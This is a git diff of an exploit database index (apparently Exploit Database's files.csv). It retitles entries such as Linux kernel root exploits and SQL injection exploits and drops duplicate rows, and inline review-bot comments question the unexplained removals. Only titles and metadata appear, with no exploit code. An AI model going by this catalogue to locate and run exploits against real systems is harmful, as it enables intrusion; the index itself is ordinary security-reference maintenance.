Updated 05_19_2014

Offensive Security 2014-05-19 04:36:23 +00:00
parent a1eaa87beb
commit 51cca24be3
30 changed files with 595 additions and 1468 deletions

@ -744,7 +744,7 @@ id,file,description,date,author,platform,type,port
923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0
924,platforms/linux/local/924.c,"sash <= 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0
925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0
926,platforms/linux/local/926.c,"Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)",2005-10-26,qobaiashi,linux,local,0
926,platforms/linux/local/926.c,"Linux Kernel 2.4/2.6 - bluez Local Root Privilege Escalation Exploit (Update 3)",2005-10-26,qobaiashi,linux,local,0
927,platforms/windows/local/927.c,"MS Jet Database (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0
928,platforms/php/webapps/928.py,"PunBB 1.2.4 (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0
929,platforms/windows/local/929.py,"MS Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-12,"Tal Zeltzer",windows,local,0
@ -8077,7 +8077,7 @@ id,file,description,date,author,platform,type,port
8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0
8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0
8571,platforms/php/webapps/8571.txt,"Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability",2009-04-29,"ThE g0bL!N",php,webapps,0
8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0
8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0
8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0
8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0
8577,platforms/php/webapps/8577.txt,"leap cms 0.1.4 (sql/xss/su) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0
@ -8176,7 +8176,7 @@ id,file,description,date,author,platform,type,port
8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 (.hfz) Directory Traversal Vulnerability",2009-05-13,Nine:Situations:Group,windows,local,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS <= 1.9 (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0
8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0
8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x - ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0
8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability",2009-05-13,Qabandi,php,webapps,0
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling Vulnerability",2009-05-14,G4N0K,php,webapps,0
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0
@ -8899,8 +8899,8 @@ id,file,description,date,author,platform,type,port
9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download Vulnerability",2009-08-13,"aBo MoHaMeD",hardware,remote,0
9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
9434,platforms/php/webapps/9434.txt,"tgs cms 0.x (xss/sql/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x sock_sendpage() Local Root Exploit #2",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,IRCRASH,php,webapps,0
9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 (competition) SQL Injection Vuln",2009-08-14,Mr.SQL,php,webapps,0
9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (simple ver)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (Simple Version)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9007,7 +9007,7 @@ id,file,description,date,author,platform,type,port
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 - (32bit) ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit",2009-08-31,"Jon Oberheide",linux,local,0
9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc)",2009-08-31,"Ramon Valle",linux,local,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (PPC Edition)",2009-08-31,"Ramon Valle",linux,local,0
9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0
9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0
9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BOF Exploit (SEH)",2009-08-31,hack4love,windows,local,0
@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port
9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [2]",2009-09-09,"Ramon Valle",linux,local,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0
9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
9640,platforms/php/webapps/9640.txt,"gyro 5.0 (sql/xss) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]",2009-09-11,"Ramon Valle",linux,local,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
@ -9231,7 +9231,7 @@ id,file,description,date,author,platform,type,port
9839,platforms/php/webapps/9839.txt,"Achievo 1.3.4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0
9840,platforms/php/webapps/9840.txt,"Joomla GroupJive 1.8 B4 Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9843,platforms/multiple/remote/9843.txt,"Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0
@ -9291,7 +9291,6 @@ id,file,description,date,author,platform,type,port
9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0
9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0
9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0
9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
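Review bot: one row is dropped in this hunk (the header goes from 7 lines to 6) but neither the hunk nor the commit message "Updated 05_19_2014" says which entry is retired or why. A removal from files.csv should record the reason (duplicate of another ID, file moved, and so on) and be paired with the matching change under platforms/, because an ID that still has a file on disk but no index row is effectively unlisted and hard to find later.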
@ -9306,7 +9305,7 @@ id,file,description,date,author,platform,type,port
9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112
9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,N/A,osx,remote,0
9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS X)",2009-10-28,N/A,osx,remote,0
9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
@ -9338,8 +9337,6 @@ id,file,description,date,author,platform,type,port
9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0
9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0
9958,platforms/jsp/webapps/9958.txt,"Pentaho <= 1.7.0.1062 xss and information disclosure",2009-10-15,antisnatchor,jsp,webapps,0
9959,platforms/windows/dos/9959.txt,"PGP4Win 1.4.9 PoC",2009-10-23,Dr_IDE,windows,dos,0
9960,platforms/php/webapps/9960.txt,"PHP 5.3.0 pdflib file disclosure",2009-11-06,"Sina Yazdanmehr",php,webapps,0
9961,platforms/php/webapps/9961.txt,"phpCMS 2008 file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0
9962,platforms/php/webapps/9962.txt,"Piwik <= 1357 2009-08-02 file upload and code execution",2009-10-19,boecke,php,webapps,0
9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0
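Review bot: two rows are removed here (8 lines become 6) without a stated reason. Among the visible candidates, 9960 "PHP 5.3.0 pdflib file disclosure" by Sina Yazdanmehr, dated 2009-11-06, matches 9842 "PHP 5.3.0 - pdflib Arbitrary File Write" (same author, same date) that is retitled earlier in this diff, so this looks like duplicate cleanup. If so, say so in the commit message and confirm that platforms/php/webapps/9960.txt is removed or redirected to 9842 in the same change rather than left as an orphan.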
@ -9350,7 +9347,6 @@ id,file,description,date,author,platform,type,port
9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive Service privilege escalation",2009-10-20,"bellick ",windows,local,0
9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0
9972,platforms/multiple/remote/9972.c,"SSL MITM Vulnerability",2009-11-09,"Pavel Kankovsky",multiple,remote,0
9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0
9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0
9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF",2009-11-16,"Alexey Sintsov",hardware,webapps,80
@ -9362,8 +9358,7 @@ id,file,description,date,author,platform,type,port
9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0
9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0
9987,platforms/multiple/remote/9987.txt,"ZoIPer Call-Info DoS",2009-10-14,"Tomer Bitton",multiple,remote,5060
9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
9989,platforms/windows/local/9989.txt,"Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability",2009-11-11,"bellick ",windows,local,0
9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote Vulnerability",2009-11-09,"Felipe Andres Manzano",multiple,local,0
9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0
9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy ActiveX Control remote code execution",2009-10-01,Trotzkista,windows,remote,0
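Review bot: 9989 is dropped while 9988 is retitled; the two rows differ only by the word "Vulnerability" and their dates (2009-10-29 vs 2009-11-11) and share the author, so consolidating them is reasonable, but platforms/windows/local/9989.txt should go with its index row. While the 9988 row is being rewritten, the author field still carries a trailing space in `"bellick "`, which also appears on 9970 in the earlier hunk; trimming it here avoids two spellings of one author in the CSV.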
@ -9413,7 +9408,7 @@ id,file,description,date,author,platform,type,port
10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0
10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0
10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0
10039,platforms/windows/local/10039.txt,"GPG4Win GNU Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0
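Review bot: the separator added to 10039 lands inside the product name: "GPG4Win GNU - Privacy Assistant PoC" splits "GNU Privacy Assistant" (the GPA tool shipped with Gpg4win). The convention used by the other retitles in this diff is product and version, then " - ", then the description, so "GPG4Win - GNU Privacy Assistant PoC" would be the consistent form.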
@ -9440,7 +9435,7 @@ id,file,description,date,author,platform,type,port
10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0
10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0
10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0
10072,platforms/multiple/local/10072.c,"Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0
10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0
10073,platforms/windows/remote/10073.py,"XM Easy Personal FTP 5.8 DoS",2009-10-02,PLATEN,windows,remote,21
10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030
10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 XSS",2009-09-23,"Francis Provencher",novell,webapps,8030
@ -12471,9 +12466,8 @@ id,file,description,date,author,platform,type,port
14226,platforms/php/webapps/14226.txt,"Bs Home_Classifieds Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14227,platforms/php/webapps/14227.txt,"Bs Events_Locator Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14228,platforms/php/webapps/14228.txt,"Bs General_Classifieds Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script(articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - (articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14231,platforms/php/webapps/14231.txt,"Bs Auto_Classifieds Script(articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0
14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0
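Review bot: 14231 is removed as an exact duplicate of 14229 (identical title, author Sid3^effects, date 2010-07-05), which is the right call, but the hunk only touches the index; platforms/php/webapps/14231.txt needs to be removed or pointed at 14229 in the same commit, and the commit message should mention the de-duplication so the missing ID is explainable later.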
@ -13071,7 +13065,7 @@ id,file,description,date,author,platform,type,port
15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/linux/local/15023.c,"x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27+ x86_64 compat exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0
15027,platforms/windows/dos/15027.py,"MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0
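Review bot: 15023 gains a version bound ("< 2.6.36-rc4-git2") and the " - " separator, but the adjacent 15024 "Linux Kernel 2.6.27+ x86_64 compat exploit" (same date, same x86_64 compat subject) is left in the old form. If the same bound applies to both, apply it to both; otherwise a reader sees two neighbouring same-day kernel entries described under different conventions, which is exactly what this normalisation pass is meant to remove.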
@ -13261,7 +13255,7 @@ id,file,description,date,author,platform,type,port
15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 .ogg Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0
15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
@ -13390,7 +13384,7 @@ id,file,description,date,author,platform,type,port
15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0
15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Remote Directory Traversal Vulnerability",2010-11-06,"Yakir Wizman",windows,remote,0
15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla Component (com_dcnews) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0
15442,platforms/php/webapps/15442.txt,"Zeeways Adserver Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0
15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
@ -13410,7 +13404,6 @@ id,file,description,date,author,platform,type,port
15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk 1.5 - Local File Inclusion Vulnerability",2010-11-08,d3v1l,php,webapps,0
15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 0day Local Kernel Exploit",2010-11-08,"Nikita Tarakanov",windows,local,0
15462,platforms/php/webapps/15462.txt,"Joomla DCNews Component com_dcnews LFI Vulnerability",2010-11-08,"Th3 RDX",php,webapps,0
15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL injection Exploit",2010-11-09,"Easy Laster",php,webapps,0
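Review bot: 15462 ("Joomla DCNews Component com_dcnews LFI Vulnerability", Th3 RDX, 2010-11-08) is dropped here and its wording folded into the retitled 15440 (same author, 2010-11-06) in the previous hunk. The consolidation is sensible, but nothing records it, and platforms/php/webapps/15462.txt should be removed in the same change; otherwise the file survives without an index row and the ID 15462 silently stops resolving.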
@ -13629,7 +13622,7 @@ id,file,description,date,author,platform,type,port
15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0
15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
15725,platforms/linux/remote/15725.pl,"Exim 4.63 Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 .m3u Buffer Overflow",2010-12-11,zota,windows,local,0
15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
